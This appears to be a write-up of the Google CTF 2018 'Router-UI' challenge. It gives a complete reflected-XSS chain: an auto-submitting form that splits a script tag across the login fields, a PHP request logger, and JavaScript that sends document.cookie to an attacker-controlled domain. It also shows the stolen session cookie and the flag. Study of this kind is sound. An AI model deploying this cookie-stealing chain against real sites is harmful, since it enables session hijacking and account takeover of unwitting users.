Google CTF 2018
Router-UI
Using the domain found on the hardened aluminum key, you make your way on to the OffHub router. A revolutionary device that simplifies your life. You’re at the UI page, but attempting to brute force the password failed miserably. If we could find an XSS on the page then we could use it to steal the root user session token. In case you find something, try to send an email to wintermuted@googlegroups.com. If you claim your link includes cat pictures, I’m sure Wintermuted will click it. I hope Chrome’s XSS filter will not block the exploit though.
https://router-ui.web.ctfcompetition.com/
You can find my all CTF solution in here
XSS means cross site scripting. This gives us the clue about the weakness of the website.
When we open the website we encounter bellow window.
Try with ;
username: test
password : testpassword
Output is;
we can use this post request
I write some script for XSS vulnaribities.
But your domain must be have SSL certificates. Beacuse Google Chrome block http:// request so that, your domain must be https://
badlogin.html
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
<!DOCTYPE HTML> <html lang="en"> <head> <meta charset="utf-8" /> <title>Cats</title> </head> <body> <form method="POST" action="https://router-ui.web.ctfcompetition.com/login"> <input name="username" value="<script src=https:"> <input name="password" value="[YOURDOMAIN].com/badjs.js></script>"> </form> <script> document.forms[0].submit(); </script> </body> </html> |
badphp.php
1 2 3 |
<?php file_put_contents('logbad.txt',$_SERVER['REQUEST_URI'].PHP_EOL,FILE_APPEND); die; |
badjs.js
1 |
window.location.href='https://[YOURDOMAIN].com/badphp.php?'+document.cookie; |
After that, I send an e-mail to wintermuted@googlegroups.com
“Please visit https://www.[YOURDOMAIN].
After 1 min, I check logbad.txt and I found cookie season.
/badphp.php?flag=Try%20the%20session%20cookie;%20session=Avaev8thDieM6Quauoh2TuDeaez9Weja
I added this cookie in chrome
When I Reload the page, I loged in website. When I open the passpord value with inspector I found the flag.
<input type=”password” value=”CTF{Kao4pheitot7Ahmu}”>
CTF{Kao4pheitot7Ahmu}